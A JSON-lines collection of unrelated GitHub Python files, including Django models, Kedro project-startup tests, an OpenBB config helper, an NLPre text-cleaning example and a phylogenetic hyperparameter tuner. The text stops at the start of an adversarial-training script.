+{"seq_id":"23754786968","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.utils.translation import gettext_lazy as _\n\nfrom .base_user import User, UserManager\n\n\nclass SupportManager(UserManager):\n \"\"\"\n Manager for support user\n \"\"\"\n\n def get_queryset(self):\n return super().get_queryset().filter(user_type=8)\n\n def create_user(self, username, email=None, password=None, **extra_fields):\n extra_fields.setdefault('is_staff', False)\n extra_fields.setdefault('is_superuser', False)\n extra_fields.setdefault('user_type', 8)\n return self._create_user(username, email, password, **extra_fields)\n\n\nclass SupportUser(User):\n \"\"\"\n Support/Customer care user who can view on-boarded entities/roots or on-board entities.\n \"\"\"\n\n objects = SupportManager()\n\n class Meta:\n proxy = True\n\n\nclass SupportSetup(models.Model):\n \"\"\"\n Support Setup model to link and save the state of the support user setups by super admin\n \"\"\"\n\n support_user = models.OneToOneField(\n SupportUser,\n on_delete=models.CASCADE,\n related_name='my_setups',\n verbose_name=_('Support User')\n )\n user_created = models.ForeignKey(\n 'users.SuperAdminUser',\n on_delete=models.CASCADE,\n related_name='support_setups',\n verbose_name=_('Super Admin User')\n )\n supervisor = models.ForeignKey(\n 'users.SupervisorUser',\n on_delete=models.SET_NULL,\n related_name='my_support_setups',\n verbose_name=_('Supervisor User'),\n null=True\n )\n can_onboard_entities = models.BooleanField(default=False, verbose_name=_('Can On-board Entities?'))\n\n class Meta:\n ordering = ['-id']\n\n def __str__(self):\n \"String representation of each support setup object\"\n return f'{self.user_created} setup for {self.support_user}'\n","repo_name":"mohamedsaber12/cashout","sub_path":"users/models/support.py","file_name":"support.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"72971966038","text":"def sequential_search(list,element):\r\n index = 0\r\n found = False \r\n while index < len(list) and not found :\r\n if list[index] == element:\r\n found = True\r\n else: \r\n index = index + 1\r\n return found , index\r\nprint(sequential_search([1,3,5,7,8,90,4], 90))","repo_name":"abeerelkhamisy/tasks_ieee","sub_path":"seq-search.py","file_name":"seq-search.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"7781163395","text":"import platform\nimport logging.config\nimport os\n\nMACOS, LINUX, WINDOWS = (\n platform.system() == x for x in [\"Darwin\", \"Linux\", \"Windows\"]\n) # environment booleans\n\nLOGGING_NAME = \"LLMCode\"\n\n\ndef set_logging(name=LOGGING_NAME, verbose=True):\n rank = int(os.getenv(\"RANK\", -1)) # rank in world for Multi-GPU\n level = logging.INFO if verbose and rank in {-1, 0} else logging.ERROR\n logging.config.dictConfig(\n {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"formatters\": {name: {\"format\": \"%(message)s\"}},\n \"handlers\": {\n name: {\n \"class\": \"logging.StreamHandler\",\n \"formatter\": name,\n \"level\": level,\n }\n },\n \"loggers\": {name: {\"level\": level, \"handlers\": [name], \"propagate\": False}},\n }\n )\n\n\ndef emojis(string=\"\"):\n \"\"\"Return platform-dependent emoji-safe version of string.\"\"\"\n return string.encode().decode(\"ascii\", \"ignore\") if WINDOWS else string\n\n\nclass EmojiFilter(logging.Filter):\n \"\"\"\n A custom logging filter class for removing emojis in log messages.\n\n This filter is particularly useful for ensuring compatibility with Windows terminals\n that may not support the display of emojis in log messages.\n \"\"\"\n\n def filter(self, record):\n \"\"\"Filter logs by emoji unicode characters on windows.\"\"\"\n record.msg = emojis(record.msg)\n return super().filter(record)\n\n\n# Set logger\nset_logging(LOGGING_NAME, verbose=True) # run before defining LOGGER\nLOGGER = logging.getLogger(LOGGING_NAME)\nif WINDOWS: # emoji-safe logging\n LOGGER.addFilter(EmojiFilter())\n","repo_name":"javierganan99/LLMCode","sub_path":"LLMCode/utils/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"70011441238","text":"from src.command.view_command import AppCommand\nfrom src.command.video_command import VideoCommand\n\nimport customtkinter\nfrom dataclasses import dataclass\n\n@dataclass\nclass App:\n\n def __init__(self, view_command:AppCommand, video:VideoCommand):\n self.command = view_command\n self.video = video\n\n def home(self):\n\n customtkinter.set_appearance_mode(\"System\") # Modes: system (default), light, dark\n customtkinter.set_default_color_theme(\"blue\") # Themes: blue (default), dark-blue, green\n\n app = customtkinter.CTk() # create CTk window like you do with the Tk window\n app.geometry(\"400x240\")\n\n def start():\n self.video.get_faces_on_video()\n\n def move():\n self.video.move_clips()\n \n\n # Use CTkButton instead of tkinter Button\n button1 = customtkinter.CTkButton(master=app, text=\"Start\", command=start)\n button1.place(relx=0.25, rely=0.4, anchor=customtkinter.CENTER)\n button2 = customtkinter.CTkButton(master=app, text=\"Move clips\", command=move)\n button2.place(relx=0.75, rely=0.4, anchor=customtkinter.CENTER)\n\n app.mainloop()\n","repo_name":"LiR4/Catch-Face","sub_path":"src/view/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"12797459416","text":"import os\nimport re\nimport sys\nfrom pathlib import Path\n\nimport pytest\nimport toml\n\nfrom kedro import __version__ as kedro_version\nfrom kedro.framework.startup import (\n ProjectMetadata,\n _get_project_metadata,\n _is_project,\n _validate_source_path,\n bootstrap_project,\n)\n\n\nclass TestIsProject:\n project_path = Path.cwd()\n\n def test_no_metadata_file(self, mocker):\n mocker.patch.object(Path, \"is_file\", return_value=False)\n\n assert not _is_project(self.project_path)\n\n def test_toml_invalid_format(self, tmp_path):\n \"\"\"Test for loading context from an invalid path. \"\"\"\n toml_path = tmp_path / \"pyproject.toml\"\n toml_path.write_text(\"!!\") # Invalid TOML\n\n assert not _is_project(tmp_path)\n\n def test_non_kedro_project(self, mocker):\n mocker.patch.object(Path, \"is_file\", return_value=True)\n pyproject_toml_payload = {\"tool\": {}}\n mocker.patch(\"anyconfig.load\", return_value=pyproject_toml_payload)\n\n assert not _is_project(self.project_path)\n\n def test_valid_toml_file(self, mocker):\n mocker.patch.object(Path, \"is_file\", return_value=True)\n pyproject_toml_payload = {\"tool\": {\"kedro\": {}}}\n mocker.patch(\"anyconfig.load\", return_value=pyproject_toml_payload)\n\n assert _is_project(self.project_path)\n\n\nclass TestGetProjectMetadata:\n project_path = Path.cwd()\n\n def test_no_config_files(self, mocker):\n mocker.patch.object(Path, \"is_file\", return_value=False)\n\n pattern = (\n f\"Could not find the project configuration file 'pyproject.toml' \"\n f\"in {self.project_path}\"\n )\n with pytest.raises(RuntimeError, match=re.escape(pattern)):\n _get_project_metadata(self.project_path)\n\n def test_toml_invalid_format(self, tmp_path):\n \"\"\"Test for loading context from an invalid path. \"\"\"\n toml_path = tmp_path / \"pyproject.toml\"\n toml_path.write_text(\"!!\") # Invalid TOML\n pattern = \"Failed to parse 'pyproject.toml' file\"\n with pytest.raises(RuntimeError, match=re.escape(pattern)):\n _get_project_metadata(str(tmp_path))\n\n def test_valid_toml_file(self, mocker):\n mocker.patch.object(Path, \"is_file\", return_value=True)\n pyproject_toml_payload = {\n \"tool\": {\n \"kedro\": {\n \"package_name\": \"fake_package_name\",\n \"project_name\": \"fake_project_name\",\n \"project_version\": kedro_version,\n }\n }\n }\n mocker.patch(\"anyconfig.load\", return_value=pyproject_toml_payload)\n\n actual = _get_project_metadata(self.project_path)\n\n expected = ProjectMetadata(\n source_dir=self.project_path / \"src\", # default\n config_file=self.project_path / \"pyproject.toml\",\n package_name=\"fake_package_name\",\n project_name=\"fake_project_name\",\n project_version=kedro_version,\n project_path=self.project_path,\n )\n assert actual == expected\n\n def test_toml_file_with_extra_keys(self, mocker):\n mocker.patch.object(Path, \"is_file\", return_value=True)\n pyproject_toml_payload = {\n \"tool\": {\n \"kedro\": {\n \"package_name\": \"fake_package_name\",\n \"project_name\": \"fake_project_name\",\n \"project_version\": kedro_version,\n \"unexpected_key\": \"hello\",\n }\n }\n }\n mocker.patch(\"anyconfig.load\", return_value=pyproject_toml_payload)\n pattern = (\n \"Found unexpected keys in 'pyproject.toml'. Make sure it \"\n \"only contains the following keys: ['package_name', \"\n \"'project_name', 'project_version', 'source_dir'].\"\n )\n\n with pytest.raises(RuntimeError, match=re.escape(pattern)):\n _get_project_metadata(self.project_path)\n\n def test_toml_file_has_missing_mandatory_keys(self, mocker):\n mocker.patch.object(Path, \"is_file\", return_value=True)\n pyproject_toml_payload = {\n \"tool\": {\n \"kedro\": {\"project_version\": kedro_version, \"unexpected_key\": \"hello\"}\n }\n }\n mocker.patch(\"anyconfig.load\", return_value=pyproject_toml_payload)\n pattern = (\n \"Missing required keys ['package_name', 'project_name'] \"\n \"from 'pyproject.toml'.\"\n )\n\n with pytest.raises(RuntimeError, match=re.escape(pattern)):\n _get_project_metadata(self.project_path)\n\n def test_toml_file_without_kedro_section(self, mocker):\n mocker.patch.object(Path, \"is_file\", return_value=True)\n mocker.patch(\"anyconfig.load\", return_value={})\n\n pattern = \"There's no '[tool.kedro]' section in the 'pyproject.toml'.\"\n\n with pytest.raises(RuntimeError, match=re.escape(pattern)):\n _get_project_metadata(self.project_path)\n\n def test_source_dir_specified_in_toml(self, mocker):\n mocker.patch.object(Path, \"is_file\", return_value=True)\n source_dir = \"test_dir\"\n pyproject_toml_payload = {\n \"tool\": {\n \"kedro\": {\n \"source_dir\": source_dir,\n \"package_name\": \"fake_package_name\",\n \"project_name\": \"fake_project_name\",\n \"project_version\": kedro_version,\n }\n }\n }\n mocker.patch(\"anyconfig.load\", return_value=pyproject_toml_payload)\n\n project_metadata = _get_project_metadata(self.project_path)\n\n assert project_metadata.source_dir == self.project_path / source_dir\n\n @pytest.mark.parametrize(\n \"invalid_version\", [\"0.13.0\", \"10.0\", \"101.1\", \"100.0\", \"-0\"]\n )\n def test_invalid_version(self, invalid_version, mocker):\n mocker.patch.object(Path, \"is_file\", return_value=True)\n pyproject_toml_payload = {\n \"tool\": {\n \"kedro\": {\n \"source_dir\": \"source_dir\",\n \"package_name\": \"fake_package_name\",\n \"project_name\": \"fake_project_name\",\n \"project_version\": invalid_version,\n }\n }\n }\n mocker.patch(\"anyconfig.load\", return_value=pyproject_toml_payload)\n\n pattern = (\n f\"Your Kedro project version {invalid_version} does not match \"\n f\"Kedro package version {kedro_version} you are running.\"\n )\n with pytest.raises(ValueError, match=re.escape(pattern)):\n _get_project_metadata(self.project_path)\n\n\nclass TestValidateSourcePath:\n @pytest.mark.parametrize(\n \"source_dir\", [\".\", \"src\", \"./src\", \"src/nested\", \"src/nested/nested\"]\n )\n def test_valid_source_path(self, tmp_path, source_dir):\n source_path = (tmp_path / source_dir).resolve()\n source_path.mkdir(parents=True, exist_ok=True)\n _validate_source_path(source_path, tmp_path.resolve())\n\n @pytest.mark.parametrize(\"source_dir\", [\"..\", \"src/../..\", \"~\"])\n def test_invalid_source_path(self, tmp_path, source_dir):\n source_dir = Path(source_dir).expanduser()\n source_path = (tmp_path / source_dir).resolve()\n source_path.mkdir(parents=True, exist_ok=True)\n\n pattern = re.escape(\n f\"Source path '{source_path}' has to be relative to your project root \"\n f\"'{tmp_path.resolve()}'\"\n )\n with pytest.raises(ValueError, match=pattern):\n _validate_source_path(source_path, tmp_path.resolve())\n\n def test_non_existent_source_path(self, tmp_path):\n source_path = (tmp_path / \"non_existent\").resolve()\n\n pattern = re.escape(f\"Source path '{source_path}' cannot be found.\")\n with pytest.raises(NotADirectoryError, match=pattern):\n _validate_source_path(source_path, tmp_path.resolve())\n\n\nclass TestBootstrapProject:\n def test_bootstrap_project(self, mocker, monkeypatch, tmp_path):\n monkeypatch.delenv(\"PYTHONPATH\", raising=False)\n # assume settings.py is okay\n mocker.patch(\"kedro.framework.project._validate_module\")\n pyproject_toml_payload = {\n \"tool\": {\n \"kedro\": {\n \"package_name\": \"fake_package_name\",\n \"project_name\": \"fake_project_name\",\n \"project_version\": kedro_version,\n }\n }\n }\n pyproject_toml = tmp_path / \"pyproject.toml\"\n pyproject_toml.write_text(toml.dumps(pyproject_toml_payload))\n src_dir = tmp_path / \"src\"\n src_dir.mkdir(exist_ok=True)\n\n result = bootstrap_project(tmp_path)\n\n expected_metadata = {\n \"config_file\": pyproject_toml,\n \"package_name\": \"fake_package_name\",\n \"project_name\": \"fake_project_name\",\n \"project_path\": tmp_path,\n \"project_version\": kedro_version,\n \"source_dir\": src_dir,\n }\n assert result == ProjectMetadata(**expected_metadata)\n assert str(src_dir) in sys.path[0]\n assert os.environ[\"PYTHONPATH\"] == str(src_dir)\n","repo_name":"alxxjohn/kedro","sub_path":"tests/framework/test_startup.py","file_name":"test_startup.py","file_ext":"py","file_size_in_byte":9184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"28253395016","text":"i = len(path)-2\nwhile i > 0:\n if path[i-1 : i+2] == '/./' :\n break\n i -= 1\n \nfolderList = []\nfolder = ''\ni += 1\nreadingWord = 0\nwhile i < len(path):\n if path[i] != '/':\n if readingWord==0:\n readingWord = 1\n folder += path[i]\n elif readingWord==1:\n readingWord = 0\n \n if folder=='..':\n # Go up a directory, if possible\n if len(folderList) > 0:\n folderList.pop()\n else:\n folderList.append(folder)\n \n folder = ''\n \n i += 1\n\npath2 = ''\nfor f in folderList:\n path2 += '/' + f\n","repo_name":"NWILLROCKU/Leetcode","sub_path":"2021/0205.py","file_name":"0205.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"1941563442","text":"import numpy as np\nfrom typing import List, Dict, Tuple\nimport logging\nimport random\n\nfrom cell_lineage_tree import CellLineageTree\nfrom barcode_metadata import BarcodeMetadata\nfrom transition_wrapper_maker import TransitionWrapperMaker\nfrom split_data import create_kfold_trees, create_kfold_barcode_trees, TreeDataSplit\nfrom likelihood_scorer import LikelihoodScorer, LikelihoodScorerResult\nfrom parallel_worker import SubprocessManager\nfrom common import get_randint\nfrom model_assessor import ModelAssessor\nfrom optim_settings import KnownModelParams\n\n\nclass PenaltyScorerResult:\n def __init__(\n self,\n score: float,\n fit_results: List[LikelihoodScorerResult]):\n \"\"\"\n @param score: assumed to be higher the better\n \"\"\"\n self.score = score\n self.fit_results = fit_results\n\n\nclass PenaltyTuneResult:\n def __init__(\n self,\n tree: CellLineageTree,\n tree_splits: List[TreeDataSplit],\n results: List[PenaltyScorerResult]):\n self.tree = tree\n self.tree_splits = tree_splits\n self.results = results\n\n def get_best_result(self, warm_idx=0):\n \"\"\"\n @param warm_idx: the index of the fitted model params to use for warm starts\n @return Dict with model/optimization params\n \"\"\"\n pen_param_scores = np.array([r.score for r in self.results])\n logging.info(\"Tuning scores %s\", pen_param_scores)\n max_branch_pen_param = np.max([\n r.fit_results[0].fit_params[\"branch_pen_param\"]\n for r in self.results])\n # A hacky way to order the penalty parameters from largest to smallest\n pen_param_array = np.array([\n r.fit_results[0].fit_params[\"target_lam_pen_param\"] * max_branch_pen_param\n + r.fit_results[0].fit_params[\"branch_pen_param\"]\n for r in self.results])\n\n # The best penalty parameters is the first one before the score decreases\n best_idx = np.argmax(pen_param_scores)\n #sorted_idxs = np.argsort(-pen_param_array)\n #best_idx = sorted_idxs[0]\n #best_score = pen_param_scores[sorted_idxs[0]]\n #for idx in sorted_idxs[1:]:\n # if best_score < pen_param_scores[idx]:\n # best_score = pen_param_scores[idx]\n # best_idx = idx\n # else:\n # break\n\n best_pen_result = self.results[best_idx]\n chosen_best_res = best_pen_result.fit_results[warm_idx]\n\n fit_params = chosen_best_res.get_fit_params()\n # Popping branch length estimates because we cannot\n # initialize branch lengths from the kfold trees for the full tree\n fit_params.pop('branch_len_inners', None)\n fit_params.pop('branch_len_offsets_proportion', None)\n return self.tree, fit_params, chosen_best_res\n\n\ndef tune(\n tree: CellLineageTree,\n bcode_meta: BarcodeMetadata,\n args,\n fit_params: Dict,\n assessor: ModelAssessor,\n conv_thres: float = 1e-6):\n \"\"\"\n Tunes the `branch_pen_param`, `target_lam_pen_param` penalty parameters\n\n @return PenaltyTuneResult\n \"\"\"\n assert len(args.branch_pen_params) > 1 or len(args.target_lam_pen_params) > 1\n\n # First create the initialization/optimization settings under consideration\n fit_param_list = []\n for branch_pen_param in args.branch_pen_params:\n for target_lam_pen_param in args.target_lam_pen_params:\n if len(fit_param_list) == 0:\n new_fit_params = fit_params.copy()\n else:\n new_fit_params = {}\n new_fit_params[\"branch_pen_param\"] = branch_pen_param\n new_fit_params[\"target_lam_pen_param\"] = target_lam_pen_param\n new_fit_params[\"conv_thres\"] = conv_thres\n fit_param_list.append(new_fit_params)\n\n if bcode_meta.num_barcodes > 1:\n # For many barcodes, we split by barcode\n return _tune_hyperparams(\n fit_param_list,\n tree,\n bcode_meta,\n args,\n fit_params,\n create_kfold_barcode_trees,\n _get_many_bcode_hyperparam_score,\n assessor)\n else:\n fit_params.pop('branch_len_inners', None)\n fit_params.pop('branch_len_offsets_proportion', None)\n # For single barcode, we split into subtrees\n return _tune_hyperparams(\n fit_param_list,\n tree,\n bcode_meta,\n args,\n fit_params,\n create_kfold_trees,\n _get_one_bcode_hyperparam_score,\n assessor)\n\n\ndef _tune_hyperparams(\n fit_param_list: List[Dict],\n tree: CellLineageTree,\n bcode_meta: BarcodeMetadata,\n args,\n fit_params: Dict,\n kfold_fnc,\n hyperparam_score_fnc,\n assessor: ModelAssessor = None):\n \"\"\"\n @param max_num_chad_parents: max number of chad parents to consider\n @param conv_thres: the convergence threshold for training the model\n (should probably pick something similar to the one being used\n for the hanging chads)\n\n @return List[PenaltyScorerResult] -- corresponding to each hyperparam\n being tuned\n \"\"\"\n # First split the barcode into kfold groups\n n_splits = args.num_penalty_tune_splits if bcode_meta.num_barcodes == 1 else min(args.num_penalty_tune_splits, bcode_meta.num_barcodes)\n logging.info(\"Hyperparam tuning %d splits\", n_splits)\n\n # Make all the tree splits, but we will only fit a random number of them\n all_tree_splits = kfold_fnc(tree, bcode_meta, n_splits)\n random.shuffle(all_tree_splits)\n tree_splits = all_tree_splits[:args.max_fit_splits]\n\n trans_wrap_makers = [TransitionWrapperMaker(\n tree_split.train_clt,\n tree_split.train_bcode_meta,\n args.max_extra_steps,\n args.max_sum_states) for tree_split in tree_splits]\n\n # Actually fit the trees using the kfold barcodes\n worker_list = [LikelihoodScorer(\n get_randint(),\n tree_split.train_clt,\n tree_split.train_bcode_meta,\n args.max_iters,\n args.num_inits,\n transition_wrap_maker,\n fit_param_list=fit_param_list,\n known_params=args.known_params,\n scratch_dir=args.scratch_dir,\n use_poisson=args.use_poisson,\n assessor=assessor)\n for tree_split, transition_wrap_maker in zip(tree_splits, trans_wrap_makers)]\n\n # Only need the successful results\n if args.num_processes > 1 and len(worker_list) > 1:\n job_manager = SubprocessManager(\n worker_list,\n None,\n args.scratch_dir,\n args.num_processes)\n train_results = [r for r, _ in job_manager.run()]\n else:\n train_results = [w.run_worker(None) for w in worker_list]\n train_results = [(res, tree_split) for res, tree_split in zip(train_results, tree_splits) if res is not None]\n assert len(train_results) >= 1\n\n # Now find the best penalty param by finding the most stable one\n # Stability is defined as the least variable target lambda estimates and branch length estimates\n tune_results = []\n for idx, fit_param in enumerate(fit_param_list):\n branch_pen_param = fit_param['branch_pen_param']\n target_lam_pen_param = fit_param['target_lam_pen_param']\n logging.info(\n \"PEN PARAM setting %d: branch_pen_param %f target_lam_pen_param %f\",\n idx,\n fit_param['branch_pen_param'],\n fit_param['target_lam_pen_param'])\n res_folds = [(train_res[idx], tree_split) for train_res, tree_split in train_results]\n hyperparam_score = hyperparam_score_fnc(\n res_folds,\n args.max_extra_steps,\n args.max_sum_states,\n args.scratch_dir,\n args.use_poisson,\n args.num_processes)\n\n # Create our summary of tuning\n tune_result = PenaltyScorerResult(\n hyperparam_score,\n [res for res, _ in res_folds])\n tune_results.append(tune_result)\n logging.info(\n \"Pen param branch %f, target_lam %f, hyperparam score %s\",\n branch_pen_param,\n target_lam_pen_param,\n tune_result.score)\n\n return PenaltyTuneResult(\n tree,\n [tree_split for _, tree_split in train_results],\n tune_results)\n\n\ndef _get_many_bcode_hyperparam_score(\n pen_param_results: List[Tuple[LikelihoodScorerResult, TreeDataSplit]],\n max_extra_steps: int,\n max_sum_states: int,\n scratch_dir: str,\n use_poisson: bool,\n num_processes: int):\n \"\"\"\n @return score = the validation log likelihood\n \"\"\"\n for pen_param_res, _ in pen_param_results:\n if pen_param_res is None:\n # This pen param setting is not stable\n return -np.inf\n\n worker_list = []\n for pen_param_res, tree_split in pen_param_results:\n # Use all the fitted params from the training data since we have the\n # same tree topology\n fit_params = pen_param_res.get_fit_params()\n all_known_params = KnownModelParams(\n target_lams=True,\n tot_time=True,\n indel_params=True)\n transition_wrap_maker = TransitionWrapperMaker(\n tree_split.val_clt,\n tree_split.val_bcode_meta,\n max_extra_steps,\n max_sum_states)\n scorer = LikelihoodScorer(\n get_randint(), # seed\n tree_split.val_clt,\n tree_split.val_bcode_meta,\n # No iterations because we just want to evaluate a probability\n max_iters=0,\n num_inits=1,\n transition_wrap_maker=transition_wrap_maker,\n fit_param_list=[fit_params],\n known_params=all_known_params,\n scratch_dir=scratch_dir,\n use_poisson=use_poisson)\n worker_list.append(scorer)\n\n job_manager = SubprocessManager(\n worker_list,\n None,\n scratch_dir,\n num_processes)\n worker_results = [w[0][0] for w in job_manager.run()]\n val_log_liks = [res.log_lik for res in worker_results]\n\n tot_val_log_lik = np.sum(val_log_liks)\n logging.info(\"all hyperparam split-scores %s, (sum %f)\", val_log_liks, tot_val_log_lik)\n return tot_val_log_lik\n\n\ndef _get_one_bcode_hyperparam_score(\n pen_param_results: List[Tuple[LikelihoodScorerResult, TreeDataSplit]],\n max_extra_steps: int,\n max_sum_states: int,\n scratch_dir: str,\n use_poisson: bool,\n num_processes: int):\n \"\"\"\n @return score = Pr(validation data | train data)\n \"\"\"\n for pen_param_res, _ in pen_param_results:\n if pen_param_res is None:\n # This pen param setting is not stable\n return -np.inf\n\n worker_list = []\n for pen_param_res, tree_split in pen_param_results:\n # Need to create model parameters for the full tree since\n # we only trained on a subset of the leaves\n fit_params = pen_param_res.get_fit_params()\n #fit_params.pop('branch_len_inners', None)\n #fit_params.pop('branch_len_offsets_proportion', None)\n\n # First we need to preserve any bifurcations in the train tree\n for node in tree_split.train_clt.traverse():\n if len(node.get_children()) == 2:\n matching_node = tree_split.val_clt.search_nodes(node_id=node.node_id)[0]\n matching_node.resolved_multifurcation = True\n\n # Let's start creating the branch lenght assignments for the\n # validation leaves\n spine_lens = pen_param_res.train_history[-1][\"spine_lens\"]\n dist_to_roots = pen_param_res.train_history[-1][\"dist_to_roots\"]\n num_tot_nodes = tree_split.val_clt.get_num_nodes()\n num_train_nodes = tree_split.train_clt.get_num_nodes()\n new_br_inners = np.ones(num_tot_nodes) * 1e-10\n new_br_inners[:num_train_nodes] = fit_params['branch_len_inners']\n # We will place the validation leaves at the top of the multifurcation\n # This is a somewhat arbitrary choice.\n # However we definitely cannot maximize validation log lik wrt the validation offsets.\n # Otherwise penalty param picking will not work.\n new_br_offsets = np.ones(num_tot_nodes) * 0.15\n new_br_offsets[:num_train_nodes] = fit_params['branch_len_offsets_proportion']\n for node_id in range(num_train_nodes, num_tot_nodes):\n val_node = tree_split.val_clt.search_nodes(node_id=node_id)[0]\n if not val_node.up.resolved_multifurcation:\n up_id = val_node.up.node_id\n br_inner = fit_params[\"tot_time\"] - dist_to_roots[up_id]\n spine_len = spine_lens[up_id]\n # Place halfway on the spine...\n new_br_offsets[node_id] = spine_len/2/br_inner\n\n fit_params['branch_len_inners'] = new_br_inners\n fit_params['branch_len_offsets_proportion'] = new_br_offsets\n all_known_params = KnownModelParams(\n target_lams=True,\n tot_time=True,\n indel_params=True)\n\n transition_wrap_maker = TransitionWrapperMaker(\n tree_split.val_clt,\n tree_split.val_bcode_meta,\n max_extra_steps,\n max_sum_states)\n scorer = LikelihoodScorer(\n get_randint(), # seed\n tree_split.val_clt,\n tree_split.val_bcode_meta,\n # No iterations because we just want to evaluate a probability\n max_iters=0,\n num_inits=1,\n transition_wrap_maker=transition_wrap_maker,\n fit_param_list=[fit_params],\n known_params=all_known_params,\n use_poisson=use_poisson,\n scratch_dir=scratch_dir)\n worker_list.append(scorer)\n\n job_manager = SubprocessManager(\n worker_list,\n None,\n scratch_dir,\n num_processes)\n worker_results = [w[0][0] for w in job_manager.run()]\n\n # Get Pr(V|T)\n hyperparam_scores = [\n res.log_lik - pen_param_res.log_lik\n for res, (pen_param_res, _) in zip(worker_results, pen_param_results)]\n tot_hyperparam_score = np.mean(hyperparam_scores)\n logging.info(\"all Pr(Val given T) %s (sum %f)\", hyperparam_scores, tot_hyperparam_score)\n return tot_hyperparam_score\n","repo_name":"matsengrp/gapml","sub_path":"gestalt/hyperparam_tuner.py","file_name":"hyperparam_tuner.py","file_ext":"py","file_size_in_byte":14548,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"85"} +{"seq_id":"28066031060","text":"# This is for helpers that do NOT import any OpenBB Modules\nfrom typing import Callable, Any, Literal\nimport os\n\nfrom rich.console import Console\n\nconsole = Console()\n\nmenus = Literal[\"\", \"featflags\", \"settings\"]\n\n\ndef handle_error(name: str, default: Any, menu: menus = \"\"):\n \"\"\"Handles the error by returning the default value and printing an\n informative error message.\n\n Parameters\n ----------\n name: str\n The name of the environment variable\n default: Any\n The value to return if the converter fails\n menu: menus\n If provided, will tell the user where to fix the setting\n\n Returns\n ----------\n Any\n The default value\n\n \"\"\"\n base = f\"[red]Invalid variable provided for variable '{name}'.\"\n if menu:\n base += f\" Please change the setting in the `{menu}` menu.\"\n base += \"[/red]\\n\"\n console.print(base)\n return default\n\n\ndef load_env_vars(\n name: str, converter: Callable, default: Any, menu: menus = \"\"\n) -> Any:\n \"\"\"Loads an environment variable and attempts to convert it to the correct data type.\n Will return the provided default if it fails\n\n Parameters\n ----------\n name: str\n The name of the environment variable\n converter: Callable\n The function to convert the env variable to the desired format\n default: Any\n The value to return if the converter fails\n menu: menus\n If provided, will tell the user where to fix the setting\n\n Returns\n ----------\n Any\n The value or the default\n \"\"\"\n raw_var = os.getenv(name, str(default))\n try:\n return converter(raw_var)\n except ValueError:\n return handle_error(name, default, menu)\n except AttributeError:\n return handle_error(name, default, menu)\n except TypeError:\n return handle_error(name, default, menu)\n\n\ndef strtobool(val):\n \"\"\"Convert a string representation of truth to true (1) or false (0).\n\n True values are 'y', 'yes', 't', 'true', 'on', and '1'; false values\n are 'n', 'no', 'f', 'false', 'off', and '0'. Raises ValueError if\n 'val' is anything else.\n \"\"\"\n val = str(val).lower()\n if val in (\"y\", \"yes\", \"t\", \"true\", \"on\", \"1\"):\n output = 1\n elif val in (\"n\", \"no\", \"f\", \"false\", \"off\", \"0\"):\n output = 0\n else:\n raise ValueError(f\"invalid truth value {val}\")\n\n return output\n","repo_name":"irvinbma/OpenBBTerminal-Finance","sub_path":"openbb_terminal/base_helpers.py","file_name":"base_helpers.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"85"} +{"seq_id":"74671117396","text":"\"\"\"\n NLPre is a text (pre)-processing library that helps smooth some of the inconsistencies found in real-world data.\n Correcting for issues like random capitalization patterns, strange hyphenations,\n and abbreviations are essential parts of wrangling textual data but are often left to the user.\n\n This is derived from this repo: https://github.com/NIHOPA/NLPre\n\n This script has an example text taken from:\n https://www.gov.uk/drug-safety-update/vivaglobin-solution-for-subcutaneous-injection-rare-risk-of-thromboembolic-events\n\n Have the option to use custom dictionary:\n\n https://github.com/NIHOPA/NLPre/blob/master/nlpre/replace_from_dictionary.py\n\"\"\"\n\n\nfrom nlpre import titlecaps, dedash, identify_parenthetical_phrases\nfrom nlpre import replace_acronyms, replace_from_dictionary\nimport nlpre\nimport logging\nnlpre.logger.setLevel(logging.INFO)\n\ntext = \"\"\"\n Vivaglobin 160 mg/mL (human normal immunoglobin solution for subcutaneous injection) is licensed as replacement\n therapy for adults and children with primary immunodeficiency syndromes, myeloma, or chronic lymphatic leukaemia.\n \"\"\"\nprefix = 'MeSH_'\n\nprint(\"The original text: \", {text})\n\nABBR = identify_parenthetical_phrases()(text)\nparsers = [dedash(), titlecaps(), replace_acronyms(ABBR),\n replace_from_dictionary(prefix=prefix)]\nfor f in parsers:\n text = f(text)\nlogging.info(f\"--- The words in the chosen dictionary are now prefixed with {prefix}\")\nprint(\"The processed text: \", {text})\n\n","repo_name":"mammykins/govuk-scispacy","sub_path":"pre_processing_health_data.py","file_name":"pre_processing_health_data.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"74837131476","text":"from row.models import Athlete\nimport sys\n\nold = Athlete.objects.all()\nfor item in old:\n\told.delete()\n\nf = open(\"rowers\")\n\n# name,side,year,status,height \nfor line in f:\n\tfields = line.split(\",\")\n\tathlete = Athlete(name=fields[0], side=fields[1], year=fields[2], status=fields[3], height=int(fields[4]))\n\tathlete.save()","repo_name":"eswalker/cos333","sub_path":"rowsite/bulkadd.py","file_name":"bulkadd.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"21333550246","text":"\"\"\"\nStandard Adversarial Training\n\"\"\"\nimport os\nimport sys\nimport numpy as np\nfrom tqdm import tqdm\n\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\")))\n\nfrom utils.utils import 